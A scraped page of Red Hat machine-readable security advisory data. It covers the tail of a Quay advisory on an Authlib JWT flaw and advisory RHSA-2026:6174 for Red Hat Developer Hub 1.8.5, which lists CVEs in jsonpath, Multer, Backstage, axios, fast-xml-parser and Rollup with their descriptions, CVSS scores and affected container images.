"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "authlib: Authlib: Signature verification bypass via malicious JWT allows unauthorized access"
}
]
}
RHSA-2026:6174
Vulnerability from csaf_redhat - Published: 2026-03-30 12:51 - Updated: 2026-04-16 10:29A flaw was found in jsonpath. The `value` function is vulnerable to Prototype Pollution, a type of vulnerability that allows an attacker to inject or modify properties of an object's prototype. This can lead to various impacts, including arbitrary code execution, privilege escalation, or denial of service (DoS).
A flaw was found in Multer, a Node.js middleware for handling `multipart/form-data`. A remote attacker can exploit this vulnerability by intentionally dropping a connection during a file upload. This can lead to a Denial of Service (DoS) due to resource exhaustion on the affected system.
A flaw was found in Multer, a Node.js middleware. A remote attacker could exploit this vulnerability by sending specially crafted malformed requests. This could lead to resource exhaustion, resulting in a Denial of Service (DoS) for the application using Multer.
A denial of service flaw was found in Multer, a Node.js middleware for handling `multipart/form-data`. A remote attacker can send specially crafted malformed requests which may induce a stack overflow. This can lead to a Denial of Service (DoS) making the service unavailable.
A flaw was found in Backstage. A symlink-based path traversal issue can be exploited in multiple Scaffolder actions and archive extraction utilities during template execution via malicious symlinks. An attacker with access to create and execute Scaffolder templates can read sensitive files, delete arbitrary files or write files outside the intended workspace, resulting in unauthorized information disclosure or system compromise.
A code injection flaw has been discovered in the npm @backstage/plugin-techdocs-node library. When TechDocs is configured with `runIn: local`, a malicious actor who can submit or modify a repository's `mkdocs.yml` file can execute arbitrary Python code on the TechDocs build server via MkDocs hooks configuration.
A denial of service flaw has been discovered in the Axios npm package. the mergeConfig function in axios crashes with a TypeError when processing configuration objects containing __proto__ as an own property. An attacker can trigger this by providing a malicious configuration object created via JSON.parse(), causing complete denial of service.
A flaw was found in fast-xml-parser. A remote attacker can exploit this vulnerability by providing a specially crafted XML input. The system incorrectly interprets a dot in a DOCTYPE entity name as a regular expression wildcard during processing. This allows the attacker to bypass security measures and inject malicious scripts, resulting in Cross-Site Scripting (XSS) when the parsed output is displayed to users.
A denial of service flaw was found in fast-xml-parser. A remote attacker can exploit this vulnerability by providing a specially crafted, small XML input. This input can force the XML parser to perform an unlimited amount of entity expansion, consuming excessive resources. This can lead to the application freezing for an extended period, resulting in a Denial of Service (DoS).
A flaw was found in Rollup, a JavaScript module bundler. Insecure file name sanitization in the core engine allows an attacker to control output filenames, potentially through command-line interface (CLI) inputs, manual chunk aliases, or malicious plugins. By using directory traversal sequences (`../`), an attacker can overwrite files anywhere on the host filesystem where the build process has write permissions. This vulnerability can lead to persistent remote code execution (RCE) by overwriting critical system or user configuration files.
A flaw was found in fast-xml-parser. A user can exploit this flaw by processing specially crafted XML data with the XML builder when the `preserveOrder` option is enabled. This can lead to a stack overflow, causing the application to crash and resulting in a Denial of Service (DoS).
| URL | Category | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Red Hat Developer Hub 1.8.5 has been released.",
"title": "Topic"
},
{
"category": "general",
"text": "Red Hat Developer Hub (RHDH) is Red Hat\u0027s enterprise-grade, self-managed, customizable developer portal based on Backstage.io. RHDH is supported on OpenShift and other major Kubernetes clusters (AKS, EKS, GKE). The core features of RHDH include a single pane of glass, a centralized software catalog, self-service via golden path templates, and Tech Docs. RHDH is extensible by plugins.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2026:6174",
"url": "https://access.redhat.com/errata/RHSA-2026:6174"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-61140",
"url": "https://access.redhat.com/security/cve/CVE-2025-61140"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-2359",
"url": "https://access.redhat.com/security/cve/CVE-2026-2359"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-24046",
"url": "https://access.redhat.com/security/cve/CVE-2026-24046"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-25153",
"url": "https://access.redhat.com/security/cve/CVE-2026-25153"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-25639",
"url": "https://access.redhat.com/security/cve/CVE-2026-25639"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-25896",
"url": "https://access.redhat.com/security/cve/CVE-2026-25896"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-26278",
"url": "https://access.redhat.com/security/cve/CVE-2026-26278"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-27606",
"url": "https://access.redhat.com/security/cve/CVE-2026-27606"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-27942",
"url": "https://access.redhat.com/security/cve/CVE-2026-27942"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-3304",
"url": "https://access.redhat.com/security/cve/CVE-2026-3304"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-3520",
"url": "https://access.redhat.com/security/cve/CVE-2026-3520"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/",
"url": "https://access.redhat.com/security/updates/classification/"
},
{
"category": "external",
"summary": "https://catalog.redhat.com/search?gs\u0026searchType=containers\u0026q=rhdh",
"url": "https://catalog.redhat.com/search?gs\u0026searchType=containers\u0026q=rhdh"
},
{
"category": "external",
"summary": "https://developers.redhat.com/rhdh/overview",
"url": "https://developers.redhat.com/rhdh/overview"
},
{
"category": "external",
"summary": "https://docs.redhat.com/en/documentation/red_hat_developer_hub",
"url": "https://docs.redhat.com/en/documentation/red_hat_developer_hub"
},
{
"category": "external",
"summary": "https://issues.redhat.com/browse/RHIDP-11518",
"url": "https://issues.redhat.com/browse/RHIDP-11518"
},
{
"category": "external",
"summary": "https://issues.redhat.com/browse/RHIDP-11639",
"url": "https://issues.redhat.com/browse/RHIDP-11639"
},
{
"category": "external",
"summary": "https://issues.redhat.com/browse/RHIDP-11731",
"url": "https://issues.redhat.com/browse/RHIDP-11731"
},
{
"category": "external",
"summary": "https://issues.redhat.com/browse/RHIDP-12139",
"url": "https://issues.redhat.com/browse/RHIDP-12139"
},
{
"category": "external",
"summary": "https://issues.redhat.com/browse/RHIDP-12323",
"url": "https://issues.redhat.com/browse/RHIDP-12323"
},
{
"category": "external",
"summary": "https://issues.redhat.com/browse/RHIDP-12335",
"url": "https://issues.redhat.com/browse/RHIDP-12335"
},
{
"category": "external",
"summary": "https://issues.redhat.com/browse/RHIDP-12392",
"url": "https://issues.redhat.com/browse/RHIDP-12392"
},
{
"category": "external",
"summary": "https://issues.redhat.com/browse/RHIDP-12417",
"url": "https://issues.redhat.com/browse/RHIDP-12417"
},
{
"category": "external",
"summary": "https://issues.redhat.com/browse/RHIDP-12444",
"url": "https://issues.redhat.com/browse/RHIDP-12444"
},
{
"category": "external",
"summary": "https://issues.redhat.com/browse/RHIDP-12447",
"url": "https://issues.redhat.com/browse/RHIDP-12447"
},
{
"category": "external",
"summary": "https://issues.redhat.com/browse/RHIDP-12480",
"url": "https://issues.redhat.com/browse/RHIDP-12480"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_6174.json"
}
],
"title": "Red Hat Security Advisory: Red Hat Developer Hub 1.8.5 release.",
"tracking": {
"current_release_date": "2026-04-16T10:29:38+00:00",
"generator": {
"date": "2026-04-16T10:29:38+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.7.5"
}
},
"id": "RHSA-2026:6174",
"initial_release_date": "2026-03-30T12:51:47+00:00",
"revision_history": [
{
"date": "2026-03-30T12:51:47+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2026-04-10T11:02:45+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-04-16T10:29:38+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Developer Hub 1.8",
"product": {
"name": "Red Hat Developer Hub 1.8",
"product_id": "Red Hat Developer Hub 1.8",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:rhdh:1.8::el9"
}
}
}
],
"category": "product_family",
"name": "Red Hat Developer Hub"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:2e8ed97c6e6d232f66bb81dc074b8bb2712dc54004cc565fcb1d2b43a9bb2046_amd64",
"product": {
"name": "registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:2e8ed97c6e6d232f66bb81dc074b8bb2712dc54004cc565fcb1d2b43a9bb2046_amd64",
"product_id": "registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:2e8ed97c6e6d232f66bb81dc074b8bb2712dc54004cc565fcb1d2b43a9bb2046_amd64",
"product_identification_helper": {
"purl": "pkg:oci/rhdh-hub-rhel9@sha256%3A2e8ed97c6e6d232f66bb81dc074b8bb2712dc54004cc565fcb1d2b43a9bb2046?arch=amd64\u0026repository_url=registry.redhat.io/rhdh\u0026tag=1774545605"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:72d72d0e8b67012bfaaeae0e1fbbcf8e35c74d4d6252051eabef3e9dd979d48e_amd64",
"product": {
"name": "registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:72d72d0e8b67012bfaaeae0e1fbbcf8e35c74d4d6252051eabef3e9dd979d48e_amd64",
"product_id": "registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:72d72d0e8b67012bfaaeae0e1fbbcf8e35c74d4d6252051eabef3e9dd979d48e_amd64",
"product_identification_helper": {
"purl": "pkg:oci/rhdh-rhel9-operator@sha256%3A72d72d0e8b67012bfaaeae0e1fbbcf8e35c74d4d6252051eabef3e9dd979d48e?arch=amd64\u0026repository_url=registry.redhat.io/rhdh\u0026tag=1774544220"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:400d642f10348a0728a624b135228714b3302f1cabc096150a340407133c54e7_amd64",
"product": {
"name": "registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:400d642f10348a0728a624b135228714b3302f1cabc096150a340407133c54e7_amd64",
"product_id": "registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:400d642f10348a0728a624b135228714b3302f1cabc096150a340407133c54e7_amd64",
"product_identification_helper": {
"purl": "pkg:oci/rhdh-operator-bundle@sha256%3A400d642f10348a0728a624b135228714b3302f1cabc096150a340407133c54e7?arch=amd64\u0026repository_url=registry.redhat.io/rhdh\u0026tag=1774549552"
}
}
}
],
"category": "architecture",
"name": "amd64"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:2e8ed97c6e6d232f66bb81dc074b8bb2712dc54004cc565fcb1d2b43a9bb2046_amd64 as a component of Red Hat Developer Hub 1.8",
"product_id": "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:2e8ed97c6e6d232f66bb81dc074b8bb2712dc54004cc565fcb1d2b43a9bb2046_amd64"
},
"product_reference": "registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:2e8ed97c6e6d232f66bb81dc074b8bb2712dc54004cc565fcb1d2b43a9bb2046_amd64",
"relates_to_product_reference": "Red Hat Developer Hub 1.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:400d642f10348a0728a624b135228714b3302f1cabc096150a340407133c54e7_amd64 as a component of Red Hat Developer Hub 1.8",
"product_id": "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:400d642f10348a0728a624b135228714b3302f1cabc096150a340407133c54e7_amd64"
},
"product_reference": "registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:400d642f10348a0728a624b135228714b3302f1cabc096150a340407133c54e7_amd64",
"relates_to_product_reference": "Red Hat Developer Hub 1.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:72d72d0e8b67012bfaaeae0e1fbbcf8e35c74d4d6252051eabef3e9dd979d48e_amd64 as a component of Red Hat Developer Hub 1.8",
"product_id": "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:72d72d0e8b67012bfaaeae0e1fbbcf8e35c74d4d6252051eabef3e9dd979d48e_amd64"
},
"product_reference": "registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:72d72d0e8b67012bfaaeae0e1fbbcf8e35c74d4d6252051eabef3e9dd979d48e_amd64",
"relates_to_product_reference": "Red Hat Developer Hub 1.8"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-61140",
"cwe": {
"id": "CWE-502",
"name": "Deserialization of Untrusted Data"
},
"discovery_date": "2026-01-28T17:00:46.678419+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:400d642f10348a0728a624b135228714b3302f1cabc096150a340407133c54e7_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:72d72d0e8b67012bfaaeae0e1fbbcf8e35c74d4d6252051eabef3e9dd979d48e_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2433946"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in jsonpath. The `value` function is vulnerable to Prototype Pollution, a type of vulnerability that allows an attacker to inject or modify properties of an object\u0027s prototype. This can lead to various impacts, including arbitrary code execution, privilege escalation, or denial of service (DoS).",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "jsonpath: jsonpath: Prototype Pollution vulnerability in the value function",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:2e8ed97c6e6d232f66bb81dc074b8bb2712dc54004cc565fcb1d2b43a9bb2046_amd64"
],
"known_not_affected": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:400d642f10348a0728a624b135228714b3302f1cabc096150a340407133c54e7_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:72d72d0e8b67012bfaaeae0e1fbbcf8e35c74d4d6252051eabef3e9dd979d48e_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-61140"
},
{
"category": "external",
"summary": "RHBZ#2433946",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2433946"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-61140",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61140"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-61140",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61140"
},
{
"category": "external",
"summary": "https://gist.github.com/Dremig/8105c189774217222a8ebea3ed4d341d",
"url": "https://gist.github.com/Dremig/8105c189774217222a8ebea3ed4d341d"
},
{
"category": "external",
"summary": "https://github.com/dchester/jsonpath",
"url": "https://github.com/dchester/jsonpath"
}
],
"release_date": "2026-01-28T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-30T12:51:47+00:00",
"details": "For more about Red Hat Developer Hub, see References links",
"product_ids": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:2e8ed97c6e6d232f66bb81dc074b8bb2712dc54004cc565fcb1d2b43a9bb2046_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6174"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:2e8ed97c6e6d232f66bb81dc074b8bb2712dc54004cc565fcb1d2b43a9bb2046_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:400d642f10348a0728a624b135228714b3302f1cabc096150a340407133c54e7_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:72d72d0e8b67012bfaaeae0e1fbbcf8e35c74d4d6252051eabef3e9dd979d48e_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "jsonpath: jsonpath: Prototype Pollution vulnerability in the value function"
},
{
"cve": "CVE-2026-2359",
"cwe": {
"id": "CWE-772",
"name": "Missing Release of Resource after Effective Lifetime"
},
"discovery_date": "2026-02-27T16:01:27.340094+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:400d642f10348a0728a624b135228714b3302f1cabc096150a340407133c54e7_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:72d72d0e8b67012bfaaeae0e1fbbcf8e35c74d4d6252051eabef3e9dd979d48e_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2443350"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Multer, a Node.js middleware for handling `multipart/form-data`. A remote attacker can exploit this vulnerability by intentionally dropping a connection during a file upload. This can lead to a Denial of Service (DoS) due to resource exhaustion on the affected system.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "multer: Multer: Denial of Service via dropped file upload connections",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:2e8ed97c6e6d232f66bb81dc074b8bb2712dc54004cc565fcb1d2b43a9bb2046_amd64"
],
"known_not_affected": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:400d642f10348a0728a624b135228714b3302f1cabc096150a340407133c54e7_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:72d72d0e8b67012bfaaeae0e1fbbcf8e35c74d4d6252051eabef3e9dd979d48e_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-2359"
},
{
"category": "external",
"summary": "RHBZ#2443350",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2443350"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-2359",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-2359"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-2359",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2359"
},
{
"category": "external",
"summary": "https://cna.openjsf.org/security-advisories.html",
"url": "https://cna.openjsf.org/security-advisories.html"
},
{
"category": "external",
"summary": "https://github.com/expressjs/multer/commit/cccf0fe0e64150c4f42ccf6654165c0d66b9adab",
"url": "https://github.com/expressjs/multer/commit/cccf0fe0e64150c4f42ccf6654165c0d66b9adab"
},
{
"category": "external",
"summary": "https://github.com/expressjs/multer/security/advisories/GHSA-v52c-386h-88mc",
"url": "https://github.com/expressjs/multer/security/advisories/GHSA-v52c-386h-88mc"
}
],
"release_date": "2026-02-27T15:42:08.088000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-30T12:51:47+00:00",
"details": "For more about Red Hat Developer Hub, see References links",
"product_ids": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:2e8ed97c6e6d232f66bb81dc074b8bb2712dc54004cc565fcb1d2b43a9bb2046_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6174"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
